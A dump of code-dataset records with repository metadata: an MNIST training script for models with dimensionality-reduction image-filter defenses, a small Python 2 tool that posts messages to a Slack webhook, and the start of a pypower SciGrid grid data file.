#!/usr/bin/env python import os, sys, pickle import keras.backend as K import tensorflow as tf import numpy as np from argparse import ArgumentParser sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from datasets import mnist from models import (train, accuracy, save_to_file, fc_100_100_10, pca_filtered_model, fastica_filtered_model, incrementalpca_filtered_model, nmf_filtered_model, truncatedsvd_filtered_model, kernelpca_filtered_model) def cached(name): filename = f"cache/{name}.pkl" if not os.path.exists(filename): return None with open(filename, "rb") as f: return pickle.load(f) argument_parser = ArgumentParser() argument_parser.add_argument("--pca", action="store_true", help="use PCA image filter defense") argument_parser.add_argument("--fastica", action="store_true", help="use FastICA image filter defense") argument_parser.add_argument("--incrementalpca", action="store_true", help="use IncrementalPCA image filter defense") argument_parser.add_argument("--nmf", action="store_true", help="use IncrementalPCA image filter defense") argument_parser.add_argument("--truncatedsvd", action="store_true", help="use TruncatedSVD image filter defense") argument_parser.add_argument("--kernelpca", action="store_true", help="use KernelPCA image filter defense") argument_parser.add_argument("--n-components", type=int, nargs="+", default=[], help="number of components for image filters") argument_parser.add_argument("--epochs", type=int, default=-1, help="default: let the model choose") argument_parser.add_argument("--random-seed", action="store_true", help="initialize model with random seed") args = argument_parser.parse_args() PREFIX = os.environ.get('PREFIX', '.') X_train, y_train, X_test, y_test = mnist() if not args.random_seed: K.clear_session() tf.set_random_seed(1234) np.random.seed(1234) no_defense_model = fc_100_100_10() print(f"Training {no_defense_model.name}...") train(no_defense_model, X_train, y_train, args.epochs, verbose=True, stop_on_stable_weights=True, reduce_lr_on_plateau=True, stop_on_stable_weights_patience=60, reduce_lr_on_plateau_patience=30) print(f"Saving {no_defense_model.name}...") save_to_file(no_defense_model, PREFIX) for n_components in args.n_components: if args.pca: pca = cached(f"pca-{n_components}") filtered_model = pca_filtered_model(no_defense_model, X_train, n_components, pca=pca) print(f"Saving {filtered_model.name}...") save_to_file(filtered_model, PREFIX) if args.fastica: fastica = cached(f"fastica-{n_components}") filtered_model = fastica_filtered_model(no_defense_model, X_train, n_components, fastica=fastica) print(f"Saving {filtered_model.name}...") save_to_file(filtered_model, PREFIX) if args.incrementalpca: incrementalpca = cached(f"incrementalpca-{n_components}") filtered_model = incrementalpca_filtered_model(no_defense_model, X_train, n_components, incrementalpca=incrementalpca) print(f"Saving {filtered_model.name}...") save_to_file(filtered_model, PREFIX) if args.nmf: nmf = cached(f"nmf-{n_components}") filtered_model = nmf_filtered_model(no_defense_model, X_train, n_components, nmf=nmf) print(f"Saving {filtered_model.name}...") save_to_file(filtered_model, PREFIX) if args.truncatedsvd: truncatedsvd = cached(f"truncatedsvd-{n_components}") filtered_model = truncatedsvd_filtered_model(no_defense_model, X_train, n_components, truncatedsvd=truncatedsvd) print(f"Saving {filtered_model.name}...") save_to_file(filtered_model, PREFIX) if args.kernelpca: kernelpca = cached(f"kernelpca-{n_components}") filtered_model = kernelpca_filtered_model(no_defense_model, X_train, n_components, kernelpca=kernelpca) print(f"Saving {filtered_model.name}...") save_to_file(filtered_model, PREFIX)
155
0
23
7ae50bdf807009d9b67b7cff99403c699f653f93
3,048
py
Python
plugin/vimtern.py
shivaghose/vimtern
2f74ee41cd34106d14362d373ef279501f9b1b5b
[ "MIT" ]
null
null
null
plugin/vimtern.py
shivaghose/vimtern
2f74ee41cd34106d14362d373ef279501f9b1b5b
[ "MIT" ]
null
null
null
plugin/vimtern.py
shivaghose/vimtern
2f74ee41cd34106d14362d373ef279501f9b1b5b
[ "MIT" ]
null
null
null
#!/usr/bin/env python ''' VIMTern.py dispatch work to your intern via Slack from the command line. ''' from random import randint from sys import exit, argv import argparse import json import yaml # To load the intrn file VERBOSE = False try: import requests except ImportError: print "Unable to import requests. Run `pip install requests`." exit(1) def _load_intrn(intrn_file="default.intrn"): ''' Load the config file. ''' config = None with open(intrn_file, 'r') as stream: try: config = yaml.load(stream) except yaml.YAMLError as ex: print str(ex) exit(1) return config def vimtern_do(msg, intrn_file): ''' Issue commands to 1ntern. ''' global VERBOSE if not intrn_file: raise AttributeError("Path to .intrn file required.") config = _load_intrn(intrn_file) if not msg or msg == '': num = len(config["default_msgs"]) msg = config["default_msgs"][randint(0, num - 1)] if not isinstance(msg, basestring): print "vimtern_do: msg is not a string." print "msg: ", msg exit(1) # Build JSON message payload msg = msg.replace('"', '').strip() channel = config["Slack"]["channel"] username = config["Slack"]["username"] icon_emoji = config["Slack"]["icon_emoji"] payload = json.dumps({ "text": msg, "channel": channel, "username": username, "icon_emoji": icon_emoji, "parse": "full" }) # Create and send POST request to Slack webhook slack_uri = config['Slack']['uri'] try: r = requests.post(slack_uri, data=payload, headers={ 'Content-type': 'application/json'}) r.raise_for_status() except requests.exceptions.ConnectionError: print "Could not establish connection to Slack." exit(1) except requests.exceptions.HTTPError as err: print "Slack API request was not successful." print err.message exit(1) except requests.exceptions.Timeout: print "Slack API request timed out." exit(1) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-f", "--config", dest='config', help="Path to the .intrn config file.") parser.add_argument("-m", "--msg", dest='msg', help="Message to send.", default="") parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', help='Verbose mode to help debug.') parser.set_defaults(verbose=False) args = parser.parse_args() VERBOSE = args.verbose if VERBOSE: print "ARGS: ", argv try: vimtern_do(args.msg, args.config) except Exception, e: print str(e) parser.print_help()
27.963303
72
0.562992
#!/usr/bin/env python ''' VIMTern.py dispatch work to your intern via Slack from the command line. ''' from random import randint from sys import exit, argv import argparse import json import yaml # To load the intrn file VERBOSE = False try: import requests except ImportError: print "Unable to import requests. Run `pip install requests`." exit(1) def _load_intrn(intrn_file="default.intrn"): ''' Load the config file. ''' config = None with open(intrn_file, 'r') as stream: try: config = yaml.load(stream) except yaml.YAMLError as ex: print str(ex) exit(1) return config def vimtern_do(msg, intrn_file): ''' Issue commands to 1ntern. ''' global VERBOSE if not intrn_file: raise AttributeError("Path to .intrn file required.") config = _load_intrn(intrn_file) if not msg or msg == '': num = len(config["default_msgs"]) msg = config["default_msgs"][randint(0, num - 1)] if not isinstance(msg, basestring): print "vimtern_do: msg is not a string." print "msg: ", msg exit(1) # Build JSON message payload msg = msg.replace('"', '').strip() channel = config["Slack"]["channel"] username = config["Slack"]["username"] icon_emoji = config["Slack"]["icon_emoji"] payload = json.dumps({ "text": msg, "channel": channel, "username": username, "icon_emoji": icon_emoji, "parse": "full" }) # Create and send POST request to Slack webhook slack_uri = config['Slack']['uri'] try: r = requests.post(slack_uri, data=payload, headers={ 'Content-type': 'application/json'}) r.raise_for_status() except requests.exceptions.ConnectionError: print "Could not establish connection to Slack." exit(1) except requests.exceptions.HTTPError as err: print "Slack API request was not successful." print err.message exit(1) except requests.exceptions.Timeout: print "Slack API request timed out." exit(1) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-f", "--config", dest='config', help="Path to the .intrn config file.") parser.add_argument("-m", "--msg", dest='msg', help="Message to send.", default="") parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', help='Verbose mode to help debug.') parser.set_defaults(verbose=False) args = parser.parse_args() VERBOSE = args.verbose if VERBOSE: print "ARGS: ", argv try: vimtern_do(args.msg, args.config) except Exception, e: print str(e) parser.print_help()
0
0
0
643c6bc30b01b37a7a4941a389cd64e1f9090dc2
398,739
py
Python
Data/scigrid-de/pypower/scigrid_2011_01_08_01.py
thanever/SOC
9f30d1a9c7610a68de9c178a1170bdf1c8ca11d4
[ "MIT" ]
null
null
null
Data/scigrid-de/pypower/scigrid_2011_01_08_01.py
thanever/SOC
9f30d1a9c7610a68de9c178a1170bdf1c8ca11d4
[ "MIT" ]
null
null
null
Data/scigrid-de/pypower/scigrid_2011_01_08_01.py
thanever/SOC
9f30d1a9c7610a68de9c178a1170bdf1c8ca11d4
[ "MIT" ]
null
null
null
from numpy import array
70.962627
137
0.463647
from numpy import array def scigrid_2011_01_08_01(): ppc = {"version": '2'} ppc["baseMVA"] = 100.0 ppc["bus"] = array([ [586, 3, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [589, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [590, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [593, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [595, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [598, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [599, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [601, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [602, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [603, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [607, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [608, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [609, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [612, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [614, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [616, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [617, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [618, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [619, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [624, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [629, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [632, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [637, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [638, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [640, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [641, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [642, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [643, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [647, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [652, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [655, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [661, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [663, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [666, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [668, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [670, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [672, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [681, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [683, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [687, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [694, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [695, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [696, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [697, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [698, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [702, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [704, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [705, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [707, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [713, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [714, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [716, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [717, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [719, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [724, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [730, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [732, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [735, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [738, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [741, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [742, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [743, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [747, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [748, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [749, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [750, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [753, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [758, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [761, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [762, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [763, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [765, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [767, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [769, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [771, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [772, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [774, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [777, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [778, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [781, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [784, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [785, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [787, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [788, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [789, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [791, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [792, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [795, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [800, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [801, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [802, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [805, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [806, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [808, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [809, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [811, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [814, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [816, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [817, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [821, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [822, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [826, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [830, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [835, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [836, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [837, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [839, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [841, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [844, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [845, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [849, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [850, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [851, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [853, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [855, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [856, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [857, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [858, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [860, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [865, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [867, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [869, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [870, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [872, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [874, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [875, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [882, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [883, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [885, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [886, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [889, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [890, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [893, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [894, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [895, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [896, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [898, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [900, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [902, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [903, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [905, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [906, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [907, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [909, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [915, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [917, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [918, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [920, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [921, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [922, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [923, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [925, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [931, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [935, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [936, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [937, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [939, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [940, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [944, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [950, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [952, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [958, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [959, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [960, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [963, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [965, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [966, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [967, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [969, 2, 0, 0, 0, 0, 0, 0.999642, 0, 220.0, 0, 1.1, 0.9 ], [971, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [973, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [976, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [978, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [982, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [983, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [984, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [985, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [986, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [987, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [988, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [993, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [994, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [995, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [997, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [999, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1000, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1002, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1003, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1007, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1008, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1010, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1011, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1012, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1014, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1026, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1027, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1028, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1029, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1030, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1031, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1032, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1033, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1034, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1035, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1036, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1037, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1038, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1039, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1040, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1041, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1042, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1043, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1044, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1045, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1046, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1047, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1048, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1049, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1050, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1051, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1052, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1053, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1054, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1055, 2, 0, 0, 